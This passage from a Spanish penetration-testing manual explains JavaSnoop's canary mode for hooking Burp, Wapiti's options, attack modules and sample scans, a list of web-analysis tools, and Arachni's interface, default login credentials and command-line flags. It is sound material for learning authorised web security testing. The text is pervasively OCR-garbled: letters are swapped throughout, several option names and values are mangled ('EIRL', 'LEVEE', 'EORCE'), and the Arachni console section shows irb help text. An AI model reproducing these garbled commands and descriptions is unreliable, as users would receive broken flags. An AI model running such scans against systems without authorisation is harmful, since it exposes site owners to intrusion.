2. Interceptar el tráfico de una aplicación de cliente basada en JAVA 

Previamente tendrriamos que realizar los primeros pasos del ejemplo anterior. 

En este ejemplo aprenderemos a intereeptar el tráfieo para las aplieaeiones JAR. Por ejemplo 
intentaremos intereeptar el tráfieo de la herramienta de proxy BURP a la herramienta JavaSnoop. 

Dado que JavaSnoop faeilita la manipulaeión de los datos y del tráfieo de las aplieaeiones, deseubrir 
el método eorreeto para enganehar, se eonvierte en una parte difieil de la evaluaeión. Aunque nada 
puede sustituir la revisión del eódigo para eomprender la lógiea de una aplieaeión, un pentester sin 
aeeeso al eódigo fuente tiene algunas opeiones para eneontrar el enlaee eorreeto. El usuario puede 
elegir una API Java que sospeehe que puede desempeñar un papel en una prueba, puede busear 
métodos por nombre o elase y puede usar un modo espeeial de JavaSnoop, llamado modo eanary. 
Este modo es muy útil en aplieaeiones más grandes, donde es difieil identifiear la elase y el método 
eorreetos. Podemos ver el modo eanary eon el ejemplo de intereeptar tráfieo BURP en la 
herramienta JavaSnoop. 

Ea eaptura de pantalla siguiente muestra la enorme lista de elases BURP eargadas en la herramienta 
JavaSnoop. Esto difieulta la identifieaeión de la elase y el método eorreetos para enganehar e 
intereeptar el tráfieo. 

Ineluso después de busear y adivinar, puede ser difieil eneontrar que métodos eoneetar. Es probable 
que los ataeantes estén interesados en métodos donde los datos que ingresan en la interfaz de 
usuario terminan yendo. Si el flujo de sus datos a través de los métodos de elase pudiera verse de 
alguna manera, puede terminar ayudando al usuario a eneontrar funeiones para enganehar. 

Deseubrir esta tiempo de vida útil es el propósito del modo eanary, una earaeteristiea úniea y útil de 
JavaSnoop. En este modo, se define algún valor "eanary" que se desea rastrear a través del sistema. 
Este debe ser un valor únieo que ingresará en la aplieaeión en algún lugar, probablemente a través 
de un eampo de formulario o un arehivo de propiedades. 

Una vez que se elige este valor, se puede inieiar el modo eanary. JavaSnoop eliminará todos los 
otros ganehos aetualmente en uso y luego agregará "eseuehas" eanary a eada método en la JVM que 
tenga el tipo de datos del eanary eomo parámetro. 

Cada vez que se eneuentra que el eanary es enviado a un método, se envia un ehirrido a JavaSnoop, 
lo que le permite al usuario saber que método funeionó eon el valor del eanary. En eierto modo, esto 
equivale a una forma muy primitiva y torpe de análisis de flujo de datos. 

Eos pasos para identifiear los métodos que se deben enganehar eon fines de prueba son los 
siguientes: 

Paso 1: inyeetar el agente JavaSnoop en el proeeso BURP 



Paso 2: abrir la interfaz del modo eanary en la herramienta JavaSnoop 
Paso 3: ingresar una eadena para busear en el eampo de entrada 
Paso 4: inieiar el oyente del modo eanary desde la interfaz 

Paso 5: enviar una solieitud para Google.eom desde el navegador a la herramienta Burp. La 
herramienta JavaSnoop comenzará a llenar la lista de métodos en los que se pasa la cadena de 
entrada. Luego podemos conectar estos métodos para fines de prueba, como se muestra en la 
siguiente captura de pantalla: 



32. wapiti 


Wapiti es un escaneador de vulnerabilidades de aplieaeiones web. Realiza exploraeiones de "eaja 
negra", no estudia el eódigo fuente de la aplieaeión web al rastrear las páginas web de la aplieaeión 
web desplegada, buseando seripts y formularios donde pueda inyeetar datos. Una vez que obtiene la 
lista de URL, formularios y sus entradas, Wapiti actúa como un fuzzer, inyectando cargas útiles para 
ver si un script es vulnerable. 

Wapiti puede detectar las siguientes vulnerabilidades: 

• Revelación de archivos (Local / remoto incluye / requiere, fopen, readfile ...) 

• Inyección de base de datos (PHP / JSP / ASP SQL Injections e XPath Injections) 

• Inyección XSS (Cross Site Scripting) (reflejada y permanente) 

• Detección de ejecución de comando (eval (), system (), passtru () ...) 

• Inyección CRLF (división de respuesta HTTP, fljación de sesión ...) 

• Inyección XXL (Entidad Externa XML) 

• SRE (falsificación de solicitud del lado del servidor) 

• Uso de archivos potencialmente peligrosos (gracias a la base de datos Nikto) 

• Configuraciones débiles de .htaccess que pueden ser anuladas 

• Presencia de archivos de copia de seguridad que proporcionan información confidencial 
(divulgación del código fúente) 

• Shellshock (también conocido como Bash bug) 

Un módulo destructor también permite forzar los nombres de directorios y archivos en el servidor 
web de destino. Wapiti admite los métodos GET y POST HTTP para los ataques. También admite 
formularios multiparte y puede inyectar payloads en nombres de archivos (subir). Eas advertencias 
se generan cuando se encuentra una anomalía. Wapiti puede marcar la diferencia entre las 
vulnerabilidades XSS permanentes y reflejadas. 

Características generales : 

• Genera informes de vulnerabilidad en varios formatos (HTML, XML, JSON, TXT ...) 

• Puede suspender y reanudar un escaneo o un ataque (mecanismo de sesión usando bases de 
datos sqliteS) 

• Puede dar colores en el terminal para resaltar vulnerabilidades. 

• Diferentes niveles de verbosidad. 

• Manera rápida y fácil de activar / desactivar módulos de ataque. 

• Agregar una carga útil puede ser tan fácil como agregar una línea a un archivo de texto 

usage: wapiti [-h] [-uURL] [—scope {page,folder,domain,url}] 

[-m MODULES LIST] [-list-modules] [-1 LEVEE] [-p PROXY URL] 

[-a CREDENTIALS] [—auth-type {basic,digest,kerberos,ntlm}] 

[-C COOKIE EILE] [—skip-crawl] [-resume-crawl] 

[—flush-attacks] [—flush-session] [-s URL] [-x URL] 

[-r PARAMETER] [-skip PARAMETER] [-d DEPTH] 

[—max-links-per-page MAX] [—max-flles-per-dir MAX] 

[—max-scan-time MINUTES] [—max-parameters MAX] [-S EORCE] 

[-t SECONDS] [-H HEADER] [-AAGENT] [-verify-ssl {0,1}] 

[-color] [-V EEVEE] [-f EORMAT] [-o OUPUT PATH] 

[—no-bugreport] [—versión] 




Especificación del objetivo 


-u, —url EIRL 

Especificar la EIRL que se utilizará como base para el escaneo. Cada URL 
encontrada durante el escaneo se verificará contra la URL base. Este es el 
único argumento requerido. La parte del esquema de la URL debe ser http o 
https. 

—scope SCOPE 

Definir el alcance de la exploración y los ataques. Las opciones válidas son: 
url: solo escaneará y atacará la URL base exacta dada con la opción -u 
page: atacará cada URL que coincida con la ruta de la URL base 
folder: escaneará y atacará cada URL que comience con la URL base 
valué. Esta URL base debe tener una barra diagonal sin nombre de archivo 
domain: escaneará y atacará cada URL cuyo nombre de dominio coincida 
con el desde la URL base. 


Especificación del ataque 


-m, —module 
MODULELIST 

Establecer la lista de módulos de ataque separados por comas. El 
comportamiento predeterminado cuando la opción no está configurada 
es usar el módulo más común. Los módulos comunes también se pueden 
especificar utilizando la palabra clave "common". Para iniciar un 
escaneo sin iniciar ningún ataque, simplemente dar un valor vacio (-m 
""). También puede filtrar los métodos http, por ejemplo -m "xss: get, 
exec: post". 

—list-modules 

Imprimir la lista de módulos Wapiti disponibles y salir. 

-1, -level LEVEL 

En versiones anteriores, Wapiti solia inyectar cargas de ataque en 
cadenas de consulta incluso si ningún parámetro estaba presente en la 
URL original. Si bien puede ser exitoso para encontrar vulnerabilidades 
de esta manera, fúe provocando demasiadas solicitudes para el éxito 
insuficiente. Este comportamiento ahora está oculto detrás de esta 
opción y puede ser reactivado por ajuste -1 a 2. Puede ser útil en CGIs 
cuando los desarrolladores tienen que analizar la cadena de consulta si 
mismos. El valor predeterminado para esta opción es 1. 


Opciones de proxy y autenticación 


-p, -proxy PROXY URL 

La URL proporcionada se utilizará como proxy para las 
solicitudes HTTP y HTTPS. Esta URL puede tener uno de los 
siguientes esquemas: http, https, socks. 

-a, —auth-cred 
CREDENTIALS 

Establecer las credenciales para usar para la autenticación 
HTTP en el destino. El valor dado debe estar en el formulario 
login% password (% se usa como separador) 

—auth-type TYPE 

Establecer el mecanismo de autenticación a usar. Las opciones 
válidas son basic, digest, kerberos y ntlm. La autenticación 
Kerberos y NTLM puede requerir instalar módulos de Python 
adicionales. 

-c, -cookie COOKIE LILE 

Cargar cookies desde un archivo de cookies Wapiti JSON. 






Opciones de sesión 

Desde Wapiti 3.0.0, las URL escaneadas, las vulnerabilidades descubiertas y el estado de los 
ataques se almaeenan en una base de datos sqliteS. 

El comportamiento predeterminado cuando existe una sesión de exploración previa para la URL 
base dada y el aleanee es reanudar el estado de exploraeión y ataque. 

Las siguientes opeiones permiten omitir este comportamiento: 


—skip-crawl 

Si se realizó un eseaneo anterior pero no se terminó, no reanudar el 
eseaneo. El ataque se realizará en las URL conoeidas aetualmente. 

-resume-crawl 

Si el rastreo se detuvo previamente y se inieiaron los ataques, el 
eomportamiento predeterminado es omitir el rastreo si se restaura la sesión. 
Usar esta opción para continuar el proceso de escaneo mientras mantiene 
vulnerabilidades y ataques en la sesión. 

—flush-attacks 

Olvidar todo sobre las vulnerabilidades descubiertas atacadas por el 
módulo. Solo se guardará la informaeión de exploración (rastreo) y que 

URL era. 

—flush-session 

Olvidar todo sobre el objetivo para el alcance dado. 


Escaneo y sintonización de los ataques 


-s, —start URL 

Si por alguna razón, Wapiti no eneuentra ninguna URL de la base 
URL aún puede agregar URLs para comenzar el análisis. A estas 
URLs se les dará una profundidad de 0, al igual que la URL base. 
Esta opeión se puede llamar varias veces. También puede darle 
un nombre de arehivo y Wapiti leerá las URL de archivo, una 

URL por linea. 

-X, —exelude URL 

Excluir que la URL dada sea eseaneada. El uso común es excluir 
la URL de cierre de sesión para evitar la destruceión de cookies 
de sesión. Esta opeión se puede aplicar varias veces. Ea URL 
exeluida dada como parámetro puede contener eomodines para la 
eoineideneia de patrones básteos. 

-r, —remove 

PARAMETER 

Si en el parámetro dado se eneuentra la URL eseaneada, será 
automátieamente eliminada. Esta opeión se puede usar varias 
veees. 

-skip PARAMETER 

El parámetro dado se mantendrá en URLs y formularios, pero no 
será ataeado. Util si ya conoce parámetros no vulnerables. 

-d, -depth DEPTH 

Cuando Wapiti rastrea un sitio web, le da a cada URL encontrada 
un valor de profundidad. La URL base y las URL inieiales 
adicionales (-s) tienen una profundidad de 0. Cada enlaee 
encontrado en estas URL tiene una profúndidad de 1 y asi 
sucesivamente. La profundidad máxima predeterminada es 40 y 
es muy grande. Este limite asegura que la exploraeión se 
detendrá en algún momento. Para una exploraeión rápida, se 
reeomienda una profundidad inferior a 5. 

—max-links-per-page 

MAX 

Esta es otra opeión para poder redueir la cantidad de URL 
descubiertas por el rastreador. Solo se extraerán los primeros 






enlaees MAX de cada página web. Esta opeión no es realmente 
efeetiva ya que el mismo enlace puede apareeer en diferentes 
páginas web. 

—max-files-per-dir MAX 

Eimita el número de URL para rastrear debajo de eada earpeta 
que se eneuentra en el servidor web. 

—max-sean-time 

MINUTES 

Detener el eseaneo después de MINUTES minutos si aún se está 
ejecutando. 

—max-parameters MAX 

Eas URL y formularios que tengan más de MAX parámetros de 
entrada serán descartados antes de lanzar los módulos de ataque. 

-S, —scan-force EORCE 

Cuantos más parámetros de entrada tenga una URL o formulario, 
más solieitudes tendrá que enviar Wapiti. La suma de solieitudes 
puede creeer rápidamente y atacar un formulario con 40 o más 
los campos de entrada pueden tomar una gran eantidad de 
tiempo. 

Wapiti usa una fórmula matemátiea para redueir el número de 
URLs eseaneadas. La fórmula es máximum allowed_pattems = 
220 / (math.exp (number of_parameters * faetor) ** 2) donde 
faetor es un valor interno eontrolado por el valor EORCE. Eas 
opeiones disponibles son: paranoid, sneaky, polite, normal, 
agressive, 

insane. El valor predeterminado es normal (147 URL para 1 
parámetro, 30 para 5, 5 para 10, 1 para 14 o más). El modo 
insane simplemente elimina el cálculo de estos limites, todas las 
URLs serán ataeadas. El modo paranoid ataeará 30 URL con 1 
parámetro, 5 para 2 y solo 1 para 3 y más. 


Opciones de red 


-t, —timemout 

SECONOS 

Tiempo de espera en segundos para una respuesta HTTP antes de 
considerarla fallada. 

-H, -header HEADER 

Establecer un encabezado HTTM personalizado para inyeetar en 
eada solieitud enviada por Wapiti. Esta opeión se puede usar 
varias veces. El valor debe ser una linea de encabezado HTTP 
estándar, parámetro y valor separados eon un signo 

-A, —user-agent AGENT 

El comportamiento predeterminado de Wapiti es utilizar el mismo 
agente-usuario que el TorBrowser, haeiéndolo discreto al rastrear 
sitios web estándar o .onion. Pero es posible que tenga que 
cambiarlo para evitar algunas restrieciones. 

—verify-ssl VAEUE 

Wapiti no se preocupa por la validación de certifieados por 
defecto. Este comportamiento se puede eambiar pasando 1 eomo 
valor a esta opeión. 


Opeiones de salida 

Wapiti imprime su informaeión a la salida estándar. Las 2 siguientes opeiones permiten sintonizar la 
salida. 

—color La salida se coloreará en funeión de la gravedad de la informaeión. 

El rojo es eritieo, naranja para advertencias, verde para información. 

-V, —verbose LEVEL Establezca el nivel de verbosidad para la salida. Eos valores posibles 





son quiet (0), normal (1) y detallado (2). 


Opciones de informes 

Wapiti generará un informe al final del proceso de ataque. Varios formatos de los informes están 
d isponibles. __ 


-f, —format FORMAT 

Establecer el formato del informe. Las opciones válidas son 
json, html, txt, openvas, vulneranet y xml.Aunque los 
informes HTML fueron reescritos para ser más receptivos, 
todavía son impraticables cuando hay muchas 
vulnerabilidades encontradas. 

- 0 , -output OUTPUT PATH 

Establecer la ruta donde se generará el informe. 


Otras opciones 


—versión 

Imprimir la versión de Wapiti y salir 

—no-bugreport 

Si un módulo de ataque Wapiti se cuelga, se genera un informe de error que 
es enviado para su análisis a fin de mejorar la confiabilidad de Wapiti. 

-h, —help 

Muestra las opciones detalladas 


wapiti viene con módulos integrados para probar varias vulnerabilidades en sus objetivos remotos: 

• backup: Este módulo busca copias de seguridad de Scripts en el servidor. 

• blindsql: Escáner sql ciego basado en el tiempo. 

• crlf: Buscar inyección CR / LE en encabezados HTTR 

• exec: Módulo utilizado para detectar vulnerabilidades de ejecución de comandos. 

• file: Buscar include()/fread() y otras manipulaciones de archivos vulnerables. 

• htaccess: Intentar evitar configuraciones débiles de htaccess. 

• nikto: Usar una base de datos Nikto para buscar archivos potencialmente peligrosos. 

• permanentxss: Buscar XSS permanente. 

• sql: Escáner de inyección SQL estándar basado en errores. 

• xss: Módulo para detección XSS. 

• buster: Módulo para un ataque de destmctor de archivos y directorios - buscando archivos 
"malos". 

• delay 

• methods 

• ssrf 

• shellshock: Módulo para detección de errores Shellshock 


Ejemplo 1 

wapiti -u http://mysite.com/ -d 10 —scope folder —color -v 1 -f html -o /tmp/scan_report 
Opciones usadas: 

-d: Define un límite de URL para leer con el mismo patrón, aquí limite a 10. 

—scope: Establecer el alcance de la exploración. Aquí se analizan todos los enlaces a las páginas 
que están en el mismo dominio que la URL establecida. 

—color: Usar el color para resaltar los parámetros vulnerables en la salida. 

-v: Definir el nivel de verbosidad, aquí se imprime cada URL. 

-f: Definir el tipo de informe. Aquí elegimos el formato HTML. 







-o: Definir el destino del informe. En este easo debe ser un directorio porque se elije el formato 
HTML. 


Ejemplo 2 

Si solo se quiere el ataque de un módulo, por ejemplo el crlf, se escribirla 
wapiti -u http://testphp.vulnweb.com/ -m crlf 

Ejemplo 3 

Si se quiere hacer un seguimiento detallado en pantalla, activar la opción 2 del modo verbose por 

ejemplo con el módulo backup 

wapiti -u http://testphp.vulnweb.com/ -m backup -v 2 




33. ANÁLISIS DE APLICACIÓN WEB 


arachni 

Analiza la URL y prueba las vulnerabilidades especificadas en el perfil elegido 

automater 

Fuentes: IPVoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, 
Labs.alienvault.com, ThreatExpert, VxVault, y VirusTotal. 

blindelephant 

Busca aplicaciones web 

cURL 

Herramienta válida para simular las acciones de usuarios en un navegador web. 

dirbuster 

Enumera de forma recursiva los archivos y directorios ocultos. 

dirsearch 

Eínea de comando simple diseñada para escanear directorios y archivos con fuerza 
bruta 

dotdotpwn 

fuzzer para descubrir vulnerabilidades de recorrido de directorio en software como 
servidores HTTP/ETP/TETP y plataformas web como CMS y ERP. 

dumpzilla 

Eunciona en el propio ordenador. 

fímap 

Puede encontrar, preparar, auditar, explotar para detectar errores de inclusión de 
archivos locales y remotos en webapps. 

funkload 

Es para verificar la web donde se instala este programa. 

grabber 

Escáner de aplicaciones web. 

nikto 

Escáner de servidor web 

paros 

Se trata de un proxy HTTP/HTTPS basado en Java para evaluar la vulnerabilidad 
de una aplicación web. 

powerfuzzer 

Bueno para iniciar un análisis de una web 

proxystrike 

Muy bueno. Análisis de webs. 

recon-ng 

Es un marco de reconocimiento de un dominio que nos da información exhaustiva 
de este dominio usando los distintos módulos que lleva incorporado. 

skipfish 

Herramienta de reconocimiento de seguridad de aplicaciones web. 

sparta 

Presupone que hay instaladas varias herramientas como nmap, dirbuster, hydra y 
nikto entre otras. 

ua-tester 

Esta herramienta está diseñada para verificar automáticamente una URL 
determinada 

uniscan 

Escáner de vulnerabilidad de web 

urlcrazy 

Genera y prueba tipos de dominio y variaciones para detectar y realizar sentadillas 
tipográficas, secuestro de URL, phishing y el espionaje corporativo. 

wafwOOf 

Capaz de detectar el cortafuegos de la aplicación web. 

whatweb 

Su objetivo es responder a la pregunta "¿Qué es ese sitio web?". 

xsser 

Detecta vulnerabilidades de tipo XSS 




34. Arachni 


Arachni es un programa escrito en ruby de alto rendimiento, modular y de caracteristicas completas 
destinado a ayudar a los probadores de penetración y a los administradores a evaluar la seguridad de 
las aplicaciones web. Es inteligente, se entrena monitorizando y aprendiendo del comportamiento 
de la aplicación web durante el proceso de escaneo y puede realizar un metanálisis utilizando una 
serie de factores para evaluar correctamente la confiabilidad de los resultados e identificar 
inteligentemente los falsos positivos. 

A diferencia de otros escáneres, tiene en cuenta la naturaleza dinámica de las aplicaciones web, 
puede detectar los cambios causados mientras viaja a través de los caminos de la complejidad 
ciclomática de una aplicación web y en consecuencia puede ajustarse. De esta manera los vectores 
de ataque/entrada que de otro modo serian indetectables por los no humanos, se pueden manejar sin 
problemas. Además debido a su entorno de navegador integrado, también puede auditar e 
inspeccionar el código del lado del cliente, asi como también es altamente compatible con las 
aplicaciones web complicadas que hacen un uso intensivo de tecnologias como JavaScript, HTML5, 
manipulación DOM y AJAX. 

Finalmente, es lo suficientemente versátil como para cubrir una gran cantidad de casos de uso, 
desde una simple utilidad de escáner de linea de comandos, hasta de una red de escáneres de alto 
rendimiento, a una biblioteca Ruby que permite auditorias con guiones, a una plataforma de 
colaboración web de múltiples escaneos multiusuario. 

Caracteristicas generales 

• Soporte de cookie-jar/cookie-string. 

• Soporte de encabezado personalizado. 

• Soporte SSL con opciones especificas. 

• Suplantación de agente de usuario. 

• Soporte de proxy para SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 y HTTP/1.0. 

• Autenticación proxy. 

• Autenticación del sitio (basada en SSL, basada en formularios, Cookie-Jar, Basic-Digest, 
NTLMvl, Kerberos y otros). 

• Detección automática de cierre de sesión y reingreso durante el escaneo 

• Detección de página 404 personalizada. 

• Interfaz de usuario: interfaz de linea de comando y interfaz de usuario web. 

• La funcionalidad pausa/reanudar 

• Soporte de hibernación: suspender y restaurar desde el disco. 

• Solicitudes HTTP asincronas de alto rendimiento: con concurrencia ajustable y con la 
capacidad de detectar automáticamente el estado del servidor y ajustar su concurrencia 
automáticamente. 

• Compatibilidad con valores de entrada predeterminados personalizados, utilizando pares de 
patrones y valores para ser usados para completar las entradas coincidentes. 

34.1. Utilización formato gráfico 

Para usar este programa en formato gráfico, ejecutar ./arachni web 

A continuación abrir un navegador y escribir localhost:9292 y ahora hay 2 usuarios posibles 

- Usuario administrador admin@.admin.admin y contraseña administrator 

- Usuario normal user@,user.user y contraseña regular_user 





La pantalla que nos aparece es la siguiente 


y en ella podemos ver 4 pestañas: 

- Sean: Permite iniciar y administrar escaneos, ver el estado/progreso de los activos y revisar los 
terminados. También permite compartir escaneos con otros usuarios y grupos. Con el carácter + 
para añadir un sean y schedule para programar un dia y una hora 

- Profiles. Permite crear, administrar y compartir perfiles de configuración de escaneo. 

- Dispatchers : Son agentes remotos que proporcionan instancias de escáner y estas instancias son 
las entidades que realmente realizan los escaneos. Esta pestaña permite ver y administrar estos 
agentes. 

- Users: con el carácter + para añadir un usuario y los 2 usuarios administator y regular. 

Hay 3 tipos de perfdes: Default, SQL Injection y XSS (Cross-Site Scripting) 

34.2. Utilización formato línea de comandos 
34.2.1. Arachni 

Uso: ./arachni [opciones] URL 


Generic 


-h, —help 

Visualizar estas opciones 

—versión 

Mostrar la versión 

—daemon-friendly 

Modo deamon 

—authorized-by EMAIL ADDRESS 

Dirección de correo electrónico de la persona 
que autorizó el escaneo. 


Salida 


—output-verbose 

Modo verbose 

—output-debug [LEVEL 1-4] 

Modo depuración 

—output-only-positives 

Solo genera resultados positivos. 


Scope 


—scope-include-pattem PATTERN 

Solo incluye los recursos cuya ruta coincida con 
PATTERN. Puede ser usado múltiples veces. 

—scope-include-subdomains 

Seguir los enlaces a los subdominios. 

Predeterminado: falso 

—scope-exclude-pattern PATTERN 

Excluir los recursos cuya ruta coincida con 

PATTERN. Puede ser usado múltiples veces. 

—scope-exclude-fde-extensions 
EXTENSION,EXTENSION!,.. 

Excluir los recursos con las extensiones 
especificadas. 

—scope-exclude-content-pattem PATTERN 

Excluir las páginas cuyo contenido coincida con 
PATTERN. Puede ser usado múltiples veces. 

—scope-exclude-binaries 

Excluir las páginas no basadas en texto. 

—scope-redundant-path-pattern 
PATTERN:LIMIT 

Limita el rastreo en páginas redundantes. Las URL 
que coinciden con PATTERN se rastrearán LIMIT 
cantidad de veces. Puede ser usado múltiples veces. 






—scope-auto-redundant [LIMIT] 

Seguir solo las URL con nombres de parámetros de 
consulta idénticos LIMIT cantidad de veces. 

Por defecto: 10 

—scope-directory-depth-limit LIMIT 

Límite de profundidad del directorio. 

Predeterminado: infinito. 

—scope-page-limit LIMIT 

Cuantas páginas rastrear y auditar. 

Predeterminado: infinito. 

—scope-extend-paths FILE 

Agregar las rutas en FILE a las descubiertas por el 
rastreador. Puede ser usado múltiples veces. 

—scope-restrict-paths FILE 

Usar las rutas en FILE en lugar de crawling. Puede 
ser usado múltiples veces. 

—scope-url-rewrite 
PATTERNiSUBSTITUTION 

Reescribe las URL basadas en PATTERN y 
SUBSTITUTION. 

—scope-dom-depth-limit EIMIT 

Que tan profundo entrar en el árbol DOM de cada 
página. Predeterminado: 5 

—scope-dom-event-limit EIMIT 

Cuantos eventos DOM se activarán para cada 
profundidad DOM. Por defecto: infinitos 

—scope-https-only 

Obliga al sistema a seguir solo las URL HTTPS. 
Predeterminado: falso 


Audit 


—audit-links 

Auditar los enlaces 

—audit-forms 

Auditar los formularios 

—audit-cookies 

Auditar las cookies 

—audit-cookies-extensively 

Envíe todos los enlaces y formularios de la página 
junto con las permutaciones de cookies. 

—audit-headers 

Auditar las cabeceras 

—audit-link-template TEMPLATE 

Expresión regular con capturas con nombre para usar 
para extraer información de entrada de rutas 
genéricas. Se puede usar varias veces. 

—audit-jsons 

Auditar entradas de solicitud JSON. 

—audit-xmls 

Auditar entradas de solicitud XML 

—audit-ui-inputs 

Audite elementos <input> huérfanos con eventos. 

—audit-ui-forms 

Auditoría de formularios de lU. Grupos de entrada y 
botón que no pertenecen a un elemento padre <form> 

—audit-parameter-names 

Inyectar payloads en los nombres de los parámetros. 

—audit-with-raw-payloads 

Inyectar payloads con y sin codificación HTTP. 

—audit-with-extra-parameter 

Inyectar payloads en parámetros de elementos 
adicionales. 

—audit-with-both-methods 

Auditar los elementos con solicitudes GET y POST. 

—audit-exclude-vector PATTERN 

Excluir los vectores de entrada cuyo nombre coincida 
con PATTERN. Puede ser usado múltiples veces. 

—audit-include-vector PATTERN 

Incluir solo los vectores de entrada cuyo nombre 
coincida con PATTERN. Puede ser usado múltiples 
veces. 





Entrada 


-input-value PATTERN:VALUE 

PATTERN para que coincida con los nombres de entrada y 
VALEFE para usarlos. Puede ser usado múltiples veces. 

—input-values-file EIEE 

Archivo YAML que contiene un objeto Hash con expresiones 
regulares, para que coincida con los nombres de entrada, como 
claves y los valores de entrada como valores. 

—input-without-defaults 

No usar los valores de entrada predeterminados del sistema. 

—input-force 

Rellenar incluso entradas no vacías. 


HTTP 


—http-user-agent USER AGENT 

Valor para el encabezado de solicitud HTTP User-Agent'. 

—http-request-concurrency 
MAXCONCURRENCY 

Máxima concurrencia de solicitudes HTTP. Por defecto: 20 

—http-request-timeout TIMEOUT 

Tiempo de espera de solicitud HTTP en milisegundos. 

Por defecto: 10000 

—http-request-redirect-limit EIMIT 

Cantidad máxima de redireccionamientos a seguir para 
cada solicitud HTTP. Por defecto: 5 

—http-request-queue-size 
QUEUESIZE 

Cantidad máxima de solicitudes a mantener en la cola. 

Por defecto: 100 

—http-request-header NAME=VALUE 

Especificar los encabezados personalizados para incluir en 
las solicitudes HTTP. Puede ser usado múltiples veces. 

—http-response-max-size EIMIT 

No descargar los cuerpos de respuesta más grandes que el 
LÍMITE especificado, en octetos. Por defecto: 500000 

—http-cookie-jar COOKIE JAR LILE 

Archivo jar de cookie HTTP con estilo Netscape. 

—http-cookie-string COOKIE 

Representación de cookies como un encabezado de 
respuesta HTTP 'Set-Cookie'. 

—http-authentication-username 
USERNAME 

Nombre de usuario para la autentieación HTTP. 

—http-authentication-password 
PASSWORD 

Contraseña para la autenticación HTTP. 

—http-authentication-type 

Tipo de autentieaeión HTTP: auto, basie, digest, digest ie, 
negotiate, ntlm. Por defeeto: auto 

—http-proxy ADDRESS:PORT 

Proxy a usar 

—http-proxy-authentication 
USERNAME:PASSWORD 

Credenciales de autenticación de proxy. 

—http-proxy-type 

Tipo de proxy: http, http_l_0, socks4, soeksda, soeksó, 
soeksóh. Por defecto: auto 

—http-ssl-verify-peer 

Verificar el par SSL. Predeterminado: falso 

—http-ssl-verify-host 

Verificar el dispositivo SSL. Predeterminado: falso 

—http-ssl-certificate PATH 

Certificado SSL a usar 

—http-ssl-certificate-type 

Tipo de certificado SSL: pem, der 

—http-ssl-key PATH 

Clave privada SSL a usar 

—http-ssl-key-type 

Tipo de clave privada SSL a usar: pem, der 

—http-ssl-key-password PASSWORD 

Contraseña para la clave privada SSL 

—http-ssl-ca PATH 

Archivo que contiene uno o más certificados con los que 
verificar el peer. 




—http-ssl-ea-direetory PATH 

Directorio que contiene múltiples archivos de certificados 
con los cuales verificar el peer 

—http-ssl-version 

Versión SSL a usar: TLSvl,TLSvl 0, TLSvl 1, 

TLSvl_2, SSLv2,SSLv3 


Comprobaciones 


—eheeks-list [GLOB] 

Enumerar las comprobaciones disponibles en función del 
globo proporcionado. Si no se proporciona información 
global, se enumerarán todos los controles. 

-eheeks CHECK,CHECK2,... 

Lista separada por eomas de las comprobaeiones a cargar. 

Se hace refereneia a las eomprobaeiones por su nombre de 
arehivo sin la extensión ’.rb'. Usar cheeks-lisf para 
enumerarlos todos. 


Plugins 


—plugins-list [GLOB] 

Enumera los eomplementos disponibles en funeión del 
glob proporeionado. Si no se proporeiona glob, se 
enumerarán todos los eomplementos. 

—plugin 

'PLUGIN:OPTION=VALUE,OPTION 

2=VALUE2' 

PEUGIN es el nombre del plugin tal eomo lo muestra 
plugins-list'. Eos eomplementos están refereneiados por su 
nombre de arehivo sin la extensión ’.rb'. Puede ser usado 
múltiples veees. 


Plataformas 


—platforms-list 

Eista de plataformas disponibles 

—platforms-no-fingerprinting 

Desaetiva el fingerprinting de la plataforma. Por defeeto, el 
sistema intentará identifiear las plataformas del lado del 
servidor desplegadas automátieamente para evitar el envió 
de payloads irrelevantes. 

—platforms 

PLATPORM,PL ATPORM2,... 

Eista separada por comas de plataformas (por nombre 
eorto) a auditar. Para restringir la auditoria a estas 
plataformas, habilite la opeión '-platforms-no- 
fingerprinting'. 


Sesión 


—session-eheek-url URL 

URL a utilizar para verifiear que el eseáner todavía está 
eoneetado a la aplieaeión web. 

Requiere session-eheek-pattem 

—session-eheek-pattem PATTERN 

Patrón utilizado eontra el cuerpo de 'session-eheek-url' para 
verifiear que el escáner todavía está eoneetado a la 
aplieaeión web. Requiere 'session-eheek-url'. 


Perfiles 


—profile-save-filepath EILEPATH 

Guardar el perfil/opeiones de eonfiguraeión aetuales en 
EILEPATH. 

—profile-load-filepath EILEPATH 

Cargue un perfd de configuraeión desde EIEEPATH. 







Browser cluster 


—browser-cluster-local-storage FILE 

Establece el almacenamiento local de los navegadores 
utilizando los datos JSON en EIEE. 

—browser-cluster-wait-for-element 
PATTERNiCSS 

Esperar a que aparezca el elemento que coincida con CSS 
cuando visite una página cuya URL coincida con el 
PATTERN. 

—browser-cluster-pool-size SIZE 

Cantidad de trabajadores del navegador para mantener en 
el grupo y poner a trabajar. Por defecto: 6 

—browser-cluster-j ob-timeout 
SECONDS 

Tiempo máximo permitido para cada trabajo. 

Por defecto: 10 

—browser-cluster-worker-time-to-live 
EIMIT 

Volver a generar el navegador de cada trabajador cada 
EIMIT trabajos. (Por defecto: 100) 

—browser-cluster-ignore-images 

No cargar imágenes 

—browser-cluster-screen-width 

Ancho de pantalla del navegador. Por defecto: 1600 

—browser-cluster-screen-height 

Altura de la pantalla del navegador. Por defecto: 1200 


Informe 

—report-save-path PATH 

Directorio o ruta de archivo donde almacenar el informe de escaneo. Se puede usar el archivo 
generado para crear informes en varios formatos con el ejecutable ’arachni reporter'. 

Snapshot 

—snapshot-save-path PATH 

Directorio o ruta de archivo donde almacenar la instantánea de una exploración suspendida. Se 
puede usar el archivo generado para reanudar el escaneo con el ejecutable 'arachni restore'. 

Timeout 


—timeout 

HOURS :MINUTES: SECONDS 

Detener la exploración después de que se exceda la 
duración dada. 

—timeout-suspend 

Suspender después del tiempo de espera. Se puede usar el 
archivo generado para reanudar el escaneo con el 
ejecutable ’arachni restore'. 


34.2.2. Arachni_console 

Uso: ./arachni console -h 

Usage: irb.rb [options] [programfde] [arguments] 


-f 

Suprimir lectura de ~ / .irbrc 

-m 

Modo Be (carga matemática, fracción o matriz disponibles) 

-d 

Establezca $ DEBUG en verdadero igual que 'ruby -d ' 

-r load-module 

Igual que 'ruby -r' 

-I path 

Especificar el directorio $ LOAD_PATH 

-U 

Igual que 'ruby -U' 

-E ene 

Igual que 'ruby -E’ 

-w 

Igual que 'ruby -w’ 

-W[level=2] 

Igual que 'ruby -W’ 





—eontext-mode n 

Establecer n [0-3] en el método para crear un objeto 

